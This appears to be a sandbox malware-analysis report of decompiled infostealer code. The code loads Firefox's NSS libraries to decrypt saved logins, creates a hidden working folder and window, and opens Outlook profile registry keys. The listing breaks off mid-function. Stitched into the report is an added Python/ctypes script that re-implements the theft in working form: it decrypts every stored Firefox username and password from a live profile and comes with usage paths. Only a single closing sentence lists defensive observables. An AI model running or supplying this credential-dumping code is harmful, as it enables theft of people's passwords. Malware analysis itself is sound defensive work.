                                                                    • Opcode Fuzzy Hash: d5f630e425a98e50dfa06e2096088c813359cdf5ba056af25791d08efade4967
                                                                    • Instruction Fuzzy Hash: F1718371640208BBEB10ABB5DC46FDA7BADEF04744F05402AFA05BB1E1CBB5E9149F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 98%
                                                                    			// Loads Firefox's NSS stack from the install directory passed in _a4 and resolves the
                                                                    			// exports needed to decrypt stored logins (PK11SDR_Decrypt). __ecx is the stealer's
                                                                    			// context object: +0xa8..+0xb8 receive the module handles, +0x68..+0x88 the function
                                                                    			// pointers. Returns 1 when every required module and export was found, otherwise 0.
                                                                    			E02D1B67E(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                    				WCHAR* _v8;
                                                                    				long _v12;
                                                                    				WCHAR* _v16;
                                                                    				WCHAR* _v20;
                                                                    				char _v24;
                                                                    				char _v28;
                                                                    				WCHAR* _v32;
                                                                    				WCHAR* _v36;
                                                                    				WCHAR* _v40;
                                                                    				short _v560;
                                                                    				struct HINSTANCE__* _t135;
                                                                    				WCHAR* _t158;
                                                                    				intOrPtr _t194;
                                                                    				void* _t206;
                                                                    				void* _t216;
                                                                    				void* _t218;
                                                                    
                                                                    				_t206 = __edx;
                                                                    				_t158 = 0;                                   // return value, stays 0 on failure
                                                                    				_t216 = __ecx;
                                                                    				E02D11052( &_v560, 0, 0x104);                // zero a MAX_PATH buffer
                                                                    				GetCurrentDirectoryW(0x104,  &_v560);        // save the cwd ...
                                                                    				SetCurrentDirectoryW(_a4);                   // ... and chdir into the Firefox directory so the
                                                                    				                                             // DLLs' own imports resolve from there
                                                                    				// Build full paths. E02D1362D copies a string (lstrcpyW), E02D1346A appends to it.
                                                                    				E02D1346A( &_a4, _t206, 0, "\\");            // _a4 = <dir>\
                                                                    				E02D1362D( &_v40,  &_a4);
                                                                    				E02D1346A( &_v40, _t206, 0, L"nss3.dll");    // _v40 = <dir>\nss3.dll
                                                                    				E02D1362D( &_v20,  &_a4);
                                                                    				E02D1346A( &_v20, _t206, 0, L"msvcr120.dll"); // _v20 = <dir>\msvcr120.dll (default, replaced if a probe hits)
                                                                    				E02D1362D( &_v16,  &_a4);
                                                                    				E02D1346A( &_v16, _t206, 0, L"msvcp120.dll"); // _v16 = <dir>\msvcp120.dll (default, replaced if a probe hits)
                                                                    				E02D1362D( &_v36,  &_a4);
                                                                    				E02D1346A( &_v36, _t206, 0, L"mozglue.dll"); // _v36 = <dir>\mozglue.dll
                                                                    				E02D1362D( &_v32,  &_a4);
                                                                    				E02D1346A( &_v32, _t206, 0, L"softokn3.dll"); // _v32 = <dir>\softokn3.dll
                                                                    				E02D1362D( &_v28,  &_a4);
                                                                    				E02D1346A( &_v28, _t206, 0, L"msvcp");       // _v28 = <dir>\msvcp  (prefix for version probing)
                                                                    				E02D1362D( &_v24,  &_a4);
                                                                    				E02D1346A( &_v24, _t206, 0, L"msvcr");       // _v24 = <dir>\msvcr
                                                                    				_t218 = 0x5a;                                // msvcr probe counter starts at 90
                                                                    				_v12 = 0x104;                                // msvcp probe counter; the loop below only exits at 0x96 (150),
                                                                    				                                             // so this 0x104 start looks like a decompiler artifact (the stale
                                                                    				                                             // GetCurrentDirectoryW argument) rather than the real initial value
                                                                    				while(1) {
                                                                    					// Probe <dir>\msvcp<N>.dll; E02D13272 formats N with wsprintfW
                                                                    					E02D1362D( &_v8,  &_v28);
                                                                    					E02D1346A(E02D13272( &_v8, _t206, 0, _v12), _t206, 0, L".dll");
                                                                    					if(PathFileExistsW(_v8) != 0) {
                                                                    						break;                                   // found: swap it in below, then probe msvcr
                                                                    					}
                                                                    					_v12 = _v12 + 0xa;                           // next CRT version (+10)
                                                                    					E02D15EA5(_v8);                              // free the candidate string (VirtualFree)
                                                                    					_t224 = _v12 - 0x96;
                                                                    					_v8 = _t158;
                                                                    					if(_v12 != 0x96) {
                                                                    						continue;
                                                                    					} else {
                                                                    						while(1) {
                                                                    							L5:
                                                                    							// Same probe for <dir>\msvcr<N>.dll, N = 90, 100, ..., 140
                                                                    							E02D1362D( &_v8,  &_v24);
                                                                    							E02D1346A(E02D13272( &_v8, _t206, _t224, _t218), _t206, _t224, L".dll");
                                                                    							if(PathFileExistsW(_v8) != 0) {
                                                                    								break;                               // found: swap it in below, then load
                                                                    							}
                                                                    							_t218 = _t218 + 0xa;
                                                                    							E02D15EA5(_v8);
                                                                    							_v8 = _t158;
                                                                    							if(_t218 != 0x96) {
                                                                    								continue;
                                                                    							}
                                                                    							L9:
                                                                    							// Load in dependency order; handles are kept in the context object
                                                                    							 *((intOrPtr*)(_t216 + 0xa8)) = LoadLibraryW(_v20);   // msvcr<N>.dll
                                                                    							 *((intOrPtr*)(_t216 + 0xac)) = LoadLibraryW(_v16);   // msvcp<N>.dll
                                                                    							 *((intOrPtr*)(_t216 + 0xb0)) = LoadLibraryW(_v36);   // mozglue.dll
                                                                    							 *((intOrPtr*)(_t216 + 0xb4)) = LoadLibraryW(_v40);   // nss3.dll
                                                                    							_t135 = LoadLibraryW(_v32);                            // softokn3.dll
                                                                    							 *(_t216 + 0xb8) = _t135;
                                                                    							// Only msvcp, mozglue, nss3 and softokn3 are checked; a failed msvcr load is tolerated
                                                                    							if( *((intOrPtr*)(_t216 + 0xac)) != _t158 &&  *((intOrPtr*)(_t216 + 0xb0)) != _t158) {
                                                                    								_t194 =  *((intOrPtr*)(_t216 + 0xb4));
                                                                    								if(_t194 != 0) {
                                                                    									_t230 = _t135;
                                                                    									if(_t135 != 0) {
                                                                    										_push(_t194);
                                                                    										// E02D20969 resolves a named export from nss3.dll (_t194). These nine
                                                                    										// functions are the standard NSS sequence for decrypting logins.json:
                                                                    										// NSS_Init(profile) -> PK11_GetInternalKeySlot -> PK11_CheckUserPassword /
                                                                    										// PK11_Authenticate -> NSSBase64_DecodeBuffer + PK11SDR_Decrypt per field,
                                                                    										// PR_GetError for diagnostics, PK11_FreeSlot / NSS_Shutdown for teardown.
                                                                    										 *((intOrPtr*)(_t216 + 0x68)) = E02D20969(_t194, "NSS_Init", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x80)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_GetInternalKeySlot", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x7c)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_Authenticate", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x70)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11SDR_Decrypt", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x74)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "NSSBase64_DecodeBuffer", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x78)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_CheckUserPassword", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x6c)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "NSS_Shutdown", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x84)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PK11_FreeSlot", _t230);
                                                                    										 *((intOrPtr*)(_t216 + 0x88)) = E02D20969( *((intOrPtr*)(_t216 + 0xb4)), "PR_GetError", _t230);
                                                                    										SetCurrentDirectoryW( &_v560);   // restore the saved cwd; note this happens only on the
                                                                    										                                 // success path, so on failure the process stays in <dir>
                                                                    										_t158 = 1;                        // success
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							// Free all path strings (E02D15EA5 -> VirtualFree) and return
                                                                    							E02D15EA5(_v24);
                                                                    							E02D15EA5(_v28);
                                                                    							E02D15EA5(_v32);
                                                                    							E02D15EA5(_v36);
                                                                    							E02D15EA5(_v16);
                                                                    							E02D15EA5(_v20);
                                                                    							E02D15EA5(_v40);
                                                                    							E02D15EA5(_a4);
                                                                    							return _t158;
                                                                    						}
                                                                    						E02D13437( &_v20,  &_v8);   // msvcr<N>.dll found: replace the msvcr120.dll path with it
                                                                    						E02D15EA5(_v8);
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    				E02D13437( &_v16,  &_v8);           // msvcp<N>.dll found: replace the msvcp120.dll path with it
                                                                    				E02D15EA5(_v8);
                                                                    				goto L5;
                                                                    			}
                                                                    
                                                                    Instruction address column for the listing above (one address per decompiled line, 0x02d1b67e through 0x02d1b9a6; 0x00000000 marks lines with no address).

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 02D1B6AC
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B6B5
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D13272: wsprintfW.USER32 ref: 02D1328D
                                                                    • PathFileExistsW.SHLWAPI(02D1A760,.dll,?,msvcr,?,msvcp,?,softokn3.dll,?,mozglue.dll,?,msvcp120.dll,?,msvcr120.dll,?,nss3.dll), ref: 02D1B7A3
                                                                    • PathFileExistsW.SHLWAPI(02D1A760,.dll,?,02D1A760,?,00000104,00000000), ref: 02D1B7FF
                                                                    • LoadLibraryW.KERNEL32(?,02D1A760,?,00000104,00000000), ref: 02D1B83E
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B849
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B854
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B85F
                                                                    • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B86A
                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 02D1B957
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                                    • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                                    • API String ID: 410702425-850564384
                                                                    • Opcode ID: ba5e86e14989914294350643a68110d7e95cdbadbf521a06791a910e980db6a8
                                                                    • Instruction ID: 8a394435c17d4d84aba7d4087eaa732b6daff40791fa18ff0fd0bbd596dcec68
                                                                    • Opcode Fuzzy Hash: ba5e86e14989914294350643a68110d7e95cdbadbf521a06791a910e980db6a8
                                                                    • Instruction Fuzzy Hash: 839107B1A00219FBDB18EFA1E8819EEB77AFF64304F50416AD51667750DB346E18CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
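The routine E02D1B67E above is the sample's Firefox credential-decryption loader: it probes for the CRT version shipped next to firefox.exe, loads msvcr/msvcp, mozglue.dll, nss3.dll and softokn3.dll from the install directory, and resolves the nine nss3.dll exports used to decrypt logins.json. As an added example, not code from the report or from the sample, here is a Python/ctypes re-implementation of the same steps so an analyst can reproduce them against a live Firefox profile on Windows and confirm the dependency chain and export set. The install and profile directories, the constructed logins.json, the NSS prototypes assigned as argtypes/restype and the fallback to the *120.dll names are assumptions drawn from the listing and from the public NSS headers. The candidate-name probing and logins.json parsing run anywhere; the decryption itself needs Windows and a real Firefox install.

```python
# Added example (not from the Joe Sandbox report or the sample): ctypes re-implementation of the
# NSS loading in E02D1B67E plus the PK11SDR_Decrypt step it prepares. Paths and sample JSON are assumed.
import base64
import ctypes
import json
import os
from ctypes import POINTER, Structure, c_char_p, c_int, c_uint, c_void_p


class SECItem(Structure):
    """NSS SECItem: {SECItemType type; unsigned char *data; unsigned int len;} (assumed ABI)."""
    _fields_ = [("type", c_uint), ("data", c_void_p), ("len", c_uint)]


# Export names copied from the decompiled listing; the (argtypes, restype) pairs are assumptions
# taken from the public NSS prototypes. NSSBase64_DecodeBuffer is resolved but unused here.
NSS_SIGNATURES = {
    "NSS_Init": ([c_char_p], c_int),
    "PK11_GetInternalKeySlot": ([], c_void_p),
    "PK11_CheckUserPassword": ([c_void_p, c_char_p], c_int),
    "PK11_Authenticate": ([c_void_p, c_int, c_void_p], c_int),
    "NSSBase64_DecodeBuffer": (None, c_void_p),
    "PK11SDR_Decrypt": ([POINTER(SECItem), POINTER(SECItem), c_void_p], c_int),
    "PK11_FreeSlot": ([c_void_p], None),
    "NSS_Shutdown": ([], c_int),
    "PR_GetError": ([], c_int),
}


def crt_candidates(prefix, start=90, stop=150, step=10):
    """CRT names the two probe loops try: msvcp90.dll ... msvcp140.dll (0x5a..0x96, step 0xa)."""
    return [f"{prefix}{v}.dll" for v in range(start, stop, step)]


def find_crt(install_dir, prefix, exists=os.path.exists):
    """First candidate present next to firefox.exe, else None (the sample then keeps *120.dll)."""
    for name in crt_candidates(prefix):
        path = os.path.join(install_dir, name)
        if exists(path):
            return path
    return None


def load_nss(install_dir):
    """Mirror the loader: chdir into the install dir, load the five DLLs in the sample's order,
    resolve the nine exports from nss3.dll. Windows only (ctypes.WinDLL)."""
    crt_r = find_crt(install_dir, "msvcr") or os.path.join(install_dir, "msvcr120.dll")
    crt_p = find_crt(install_dir, "msvcp") or os.path.join(install_dir, "msvcp120.dll")
    order = [crt_r, crt_p] + [os.path.join(install_dir, n) for n in ("mozglue.dll", "nss3.dll", "softokn3.dll")]
    saved = os.getcwd()
    os.chdir(install_dir)  # transitive imports resolve from cwd; the sample restores it only on success
    try:
        handles = []
        for path in order:
            try:
                handles.append(ctypes.WinDLL(path))
            except OSError:
                handles.append(None)
    finally:
        os.chdir(saved)
    if None in handles[1:]:  # like the sample: a failed msvcr load is tolerated, the other four are not
        raise RuntimeError("msvcp, mozglue, nss3 and softokn3 must all load")
    nss = {}
    for name, (argtypes, restype) in NSS_SIGNATURES.items():
        fn = getattr(handles[3], name)  # AttributeError if nss3.dll lacks the export
        fn.argtypes, fn.restype = argtypes, restype
        nss[name] = fn
    return nss


def pk11sdr_decrypt(nss, b64_blob):
    """Base64-decode (stdlib instead of NSSBase64_DecodeBuffer) and run PK11SDR_Decrypt.
    The output SECItem is allocated by NSS and, as in the sample, not freed here."""
    raw = base64.b64decode(b64_blob)
    buf = ctypes.create_string_buffer(raw, len(raw))
    inp = SECItem(0, ctypes.addressof(buf), len(raw))
    out = SECItem(0, None, 0)
    if nss["PK11SDR_Decrypt"](ctypes.byref(inp), ctypes.byref(out), None) != 0:
        raise RuntimeError(f"PK11SDR_Decrypt failed, PR_GetError={nss['PR_GetError']()}")
    return ctypes.string_at(out.data, out.len).decode("utf-8")


def parse_logins(logins_json_text):
    """Extract (hostname, encryptedUsername, encryptedPassword) from a logins.json document."""
    doc = json.loads(logins_json_text)
    return [(e["hostname"], e["encryptedUsername"], e["encryptedPassword"]) for e in doc.get("logins", [])]


def dump_profile(install_dir, profile_dir, master_password=b""):
    """Full pipeline as the stealer runs it: NSS_Init on the profile, unlock the key slot,
    decrypt every login, tear down."""
    nss = load_nss(install_dir)
    if nss["NSS_Init"](f"sql:{profile_dir}".encode()) != 0:
        raise RuntimeError("NSS_Init failed (wrong profile path or unreadable key4.db)")
    try:
        slot = nss["PK11_GetInternalKeySlot"]()
        if nss["PK11_CheckUserPassword"](slot, master_password) != 0:
            raise RuntimeError("a master password is set and was not supplied")
        nss["PK11_Authenticate"](slot, 1, None)
        with open(os.path.join(profile_dir, "logins.json"), encoding="utf-8") as fh:
            logins = parse_logins(fh.read())
        result = [(host, pk11sdr_decrypt(nss, u), pk11sdr_decrypt(nss, p)) for host, u, p in logins]
        nss["PK11_FreeSlot"](slot)
        return result
    finally:
        nss["NSS_Shutdown"]()


# Constructed sample shaped like logins.json; the blobs are placeholders, not real NSS ciphertext.
SAMPLE_USER_B64 = base64.b64encode(b"placeholder-user-blob").decode()
SAMPLE_PASS_B64 = base64.b64encode(b"placeholder-pass-blob").decode()
SAMPLE_LOGINS_JSON = json.dumps({"logins": [{"hostname": "https://example.test",
                                             "encryptedUsername": SAMPLE_USER_B64,
                                             "encryptedPassword": SAMPLE_PASS_B64}]})
```

Usage on a Windows host is dump_profile(r"C:\Program Files\Mozilla Firefox", r"C:\Users\<user>\AppData\Roaming\Mozilla\Firefox\Profiles\<id>.default-release"), with both paths assumed. From the defender's side the same listing gives the observables: a process other than firefox.exe loading nss3.dll and softokn3.dll from the Firefox install directory, a working-directory change into that directory, and subsequent reads of logins.json and key4.db in the profile.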

                                                                    C-Code - Quality: 83%
                                                                    			E02D195AA(void* __ecx, void* __eflags, void* _a4) {
                                                                    				short _v544;
                                                                    				char _v696;
                                                                    				short _v704;
                                                                    				char _v724;
                                                                    				struct tagMSG _v748;
                                                                    				struct _WNDCLASSW _v788;
                                                                    				struct _SYSTEMTIME _v804;
                                                                    				char _v808;
                                                                    				void* _v812;
                                                                    				long _v816;
                                                                    				intOrPtr _t46;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr _t52;
                                                                    				intOrPtr _t54;
                                                                    				intOrPtr _t57;
                                                                    				intOrPtr _t60;
                                                                    				intOrPtr _t65;
                                                                    				struct HWND__* _t69;
                                                                    				int _t73;
                                                                    				intOrPtr _t94;
                                                                    				void* _t95;
                                                                    				intOrPtr _t99;
                                                                    				void* _t107;
                                                                    				void* _t110;
                                                                    				struct HINSTANCE__* _t111;
                                                                    				struct HWND__* _t112;
                                                                    				void* _t114;
                                                                    				signed int _t119;
                                                                    				intOrPtr _t122;
                                                                    				intOrPtr _t125;
                                                                    				intOrPtr _t129;
                                                                    				intOrPtr _t131;
                                                                    				void* _t132;
                                                                    				void* _t133;
                                                                    				void* _t140;
                                                                    				signed int _t143;
                                                                    				signed int _t144;
                                                                    				signed int _t146;
                                                                    				void* _t150;
                                                                    
                                                                    				_t114 = __ecx;
                                                                    				_t111 = GetModuleHandleA(0);
                                                                    				_v788.hIcon = 0;
                                                                    				_v804.wSecond = 0;
                                                                    				asm("xorps xmm0, xmm0");
                                                                    				asm("stosd");
                                                                    				asm("movlpd [esp+0x30], xmm0");
                                                                    				asm("movlpd [esp+0x3c], xmm0");
                                                                    				asm("stosd");
                                                                    				asm("movlpd [esp+0x44], xmm0");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				_t46 =  *0x2d296a0; // 0x0
                                                                    				E02D11052(_t46 + 0x210, 0, 0x800);
                                                                    				_t49 =  *0x2d296a0; // 0x0
                                                                    				E02D11052(_t49 + 0x10, 0, 0x208);
                                                                    				_t52 =  *0x2d296a0; // 0x0
                                                                    				_t150 = (_t146 & 0xfffffff8) - 0x314 + 0x18;
                                                                    				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t52 + 0x10, _t133, _t140, _t110);
                                                                    				_t54 =  *0x2d296a0; // 0x0
                                                                    				lstrcatW(_t54 + 0x10, L"\\Microsoft Vision\\");
                                                                    				_t57 =  *0x2d296a0; // 0x0
                                                                    				CreateDirectoryW(_t57 + 0x10, 0);
                                                                    				_t60 =  *0x2d296a0; // 0x0
                                                                    				_t153 =  *((intOrPtr*)(_t60 + 0xa14));
                                                                    				if( *((intOrPtr*)(_t60 + 0xa14)) != 0) {
                                                                    					E02D11052( &_v544, 0, 0x208);
                                                                    					_t99 =  *0x2d296a0; // 0x0
                                                                    					_t150 = _t150 + 0xc;
                                                                    					lstrcpyW( &_v544, _t99 + 0x10);
                                                                    					lstrcatW( &_v544, "*");
                                                                    					E02D135E5(_t150,  &_v544);
                                                                    					_t107 = E02D1FF27( &_v724, _t153, _t114);
                                                                    					_t129 =  *0x2d296a0; // 0x0
                                                                    					E02D11BED(_t129 + 0xa18, _t153, _t107);
                                                                    					_t131 = _v748.pt;
                                                                    					_t154 = _t131;
                                                                    					if(_t131 != 0) {
                                                                    						E02D11AD5(_t131, _t131);
                                                                    					}
                                                                    				}
                                                                    				_t132 = 4;
                                                                    				_t143 = E02D134A7( &_v808, _t132, _t154);
                                                                    				E02D13335(E02D1346A( &_v812, _t132, _t154, L"ExplorerIdentifier"), _t154, _t143);
                                                                    				E02D15EA5(_v816);
                                                                    				_t65 =  *0x2d296a0; // 0x0
                                                                    				_v816 = 0;
                                                                    				if( *((intOrPtr*)(_t65 + 0xa14)) != 0) {
                                                                    					GetLocalTime( &_v804);
                                                                    					wsprintfW( &_v704, L"%02d-%02d-%02d_%02d.%02d.%02d", _v804.wDay & 0x0000ffff, _v804.wMonth & 0x0000ffff, _v804.wYear & 0x0000ffff, _v804.wHour & 0x0000ffff, _v804.wMinute & 0x0000ffff, _v804.wSecond & 0x0000ffff);
                                                                    					_t122 =  *0x2d296a0; // 0x0
                                                                    					_t150 = _t150 + 0x20;
                                                                    					_t26 = _t122 + 0x10; // 0x10
                                                                    					E02D1346A(E02D1346A(_t122 + 0xc, _t132, _t122 + 0xc, _t26), _t132, _t122 + 0xc,  &_v696);
                                                                    					_t94 =  *0x2d296a0; // 0x0
                                                                    					_t95 = CreateFileW( *(_t94 + 0xc), 0x10000000, 1, 0, 2, 0x80, 0);
                                                                    					_t125 =  *0x2d296a0; // 0x0
                                                                    					 *(_t125 + 4) = _t95;
                                                                    					CloseHandle(_t95);
                                                                    				}
                                                                    				_v788.lpszClassName = _v812;
                                                                    				_v788.lpfnWndProc = E02D1902E;
                                                                    				_v788.hInstance = _t111;
                                                                    				RegisterClassW( &_v788);
                                                                    				_t69 = CreateWindowExW(0, _v788.lpszClassName, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, _t111, _a4);
                                                                    				_t119 = 7;
                                                                    				_t112 = _t69;
                                                                    				memset( &_v748, 0, _t119 << 2);
                                                                    				_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                                                    				if(_t73 == 0) {
                                                                    					L9:
                                                                    					_t144 = _v748.wParam;
                                                                    					goto L10;
                                                                    				} else {
                                                                    					_t144 = _t143 | 0xffffffff;
                                                                    					while(_t73 != _t144) {
                                                                    						TranslateMessage( &_v748);
                                                                    						DispatchMessageA( &_v748);
                                                                    						_t73 = GetMessageA( &_v748, _t112, 0, 0);
                                                                    						if(_t73 != 0) {
                                                                    							continue;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    					L10:
                                                                    					E02D15EA5(_v812);
                                                                    					return _t144;
                                                                    				}
                                                                    			}
Instruction addresses, one per decompiled statement in source order (the per-line address column of the IDA plugin view; 0x00000000 marks a label or goto that has no instruction of its own):
0x02d195aa 0x02d195c2 0x02d195c4 0x02d195ca 0x02d195d2 0x02d195d5 0x02d195db 0x02d195e1 0x02d195e7 0x02d195e8 0x02d195ee 0x02d195ef 0x02d195f0 0x02d195fe 0x02d19603 0x02d19615 0x02d1961a 0x02d1961f 0x02d1962b 0x02d19631 0x02d19645 0x02d19647 0x02d19651 0x02d19657 0x02d1965c 0x02d19662 0x02d19672 0x02d19677 0x02d1967c 0x02d1968b 0x02d1969e 0x02d196ab 0x02d196b4 0x02d196ba 0x02d196c7 0x02d196cc 0x02d196d0 0x02d196d2 0x02d196d5 0x02d196d5 0x02d196d2 0x02d196dc 0x02d196ef 0x02d196f9 0x02d19702 0x02d19707 0x02d1970c 0x02d19716 0x02d19721 0x02d19758 0x02d1975e 0x02d1976b 0x02d1976f 0x02d1977d 0x02d19782 0x02d1979a 0x02d197a0 0x02d197a7 0x02d197aa 0x02d197aa 0x02d197b4 0x02d197bd 0x02d197c5 0x02d197c9 0x02d197e1 0x02d197e9 0x02d197ea 0x02d197f4 0x02d19802 0x02d19806 0x02d19835 0x02d19835 0x00000000 0x02d19808 0x02d19808 0x02d1980b 0x02d19814 0x02d1981f 0x02d1982f 0x02d19833 0x00000000 0x00000000 0x00000000 0x02d19833 0x02d19839 0x02d1983d 0x02d1984a 0x02d1984a

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 02D195BC
                                                                    • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,-00000010), ref: 02D1962B
                                                                    • lstrcatW.KERNEL32(-00000010,\Microsoft Vision\), ref: 02D19645
                                                                    • CreateDirectoryW.KERNEL32(-00000010,00000000), ref: 02D19651
                                                                    • lstrcpyW.KERNEL32 ref: 02D1968B
                                                                    • lstrcatW.KERNEL32(?,02D24A58), ref: 02D1969E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D1FF27: FindFirstFileW.KERNEL32(?,?,?,?), ref: 02D1FF54
                                                                    • GetLocalTime.KERNEL32(?,00000000,ExplorerIdentifier), ref: 02D19721
                                                                    • wsprintfW.USER32 ref: 02D19758
                                                                    • CreateFileW.KERNEL32(?,10000000,00000001,00000000,00000002,00000080,00000000,00000010,?), ref: 02D1979A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D197AA
                                                                    • RegisterClassW.USER32 ref: 02D197C9
                                                                    • CreateWindowExW.USER32 ref: 02D197E1
                                                                    • GetMessageA.USER32 ref: 02D19802
                                                                    • TranslateMessage.USER32(?), ref: 02D19814
                                                                    • DispatchMessageA.USER32 ref: 02D1981F
                                                                    • GetMessageA.USER32 ref: 02D1982F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Message$Create$FileHandlelstrcatlstrcpylstrlen$ClassCloseDirectoryDispatchFindFirstFolderLocalModulePathRegisterTimeTranslateWindowwsprintf
                                                                    • String ID: %02d-%02d-%02d_%02d.%02d.%02d$ExplorerIdentifier$\Microsoft Vision\
                                                                    • API String ID: 2678186124-2372768292
                                                                    • Opcode ID: df9af2b8aec6caa1a8b4aaefc67466a1b1fdff7eb9d8fed81ecf5545d6da1c07
                                                                    • Instruction ID: f9fcde2d5c1f18dcd0076c4a1a066044134a1d55900ebd1ec482affa68542aca
                                                                    • Opcode Fuzzy Hash: df9af2b8aec6caa1a8b4aaefc67466a1b1fdff7eb9d8fed81ecf5545d6da1c07
                                                                    • Instruction Fuzzy Hash: EE718CB2944380ABD720DBA5EC58EABB7E8FF99704F114919FA4592380DB31DD18CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E02D1A0D8(intOrPtr __ecx, void* __edx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				intOrPtr _v20;
                                                                    				short _v4116;
                                                                    				short _v8212;
                                                                    				short _v12308;
                                                                    				long _t68;
                                                                    				int _t74;
                                                                    				intOrPtr _t75;
                                                                    				void* _t76;
                                                                    				short* _t80;
                                                                    
                                                                    				_t76 = __edx;
                                                                    				_t75 = __ecx;
                                                                    				E02D11190(0x3014, __ecx);
                                                                    				_v20 = _t75;
                                                                    				_t74 = 0;
                                                                    				E02D11052( &_v4116, 0, 0x800);
                                                                    				E02D11052( &_v8212, 0, 0x800);
                                                                    				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Office\\15.0Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8) != 0) {
                                                                    					__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                                                    					if(__eflags != 0) {
                                                                    						__eflags = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676", 0, 0xf003f,  &_v8);
                                                                    						if(__eflags != 0) {
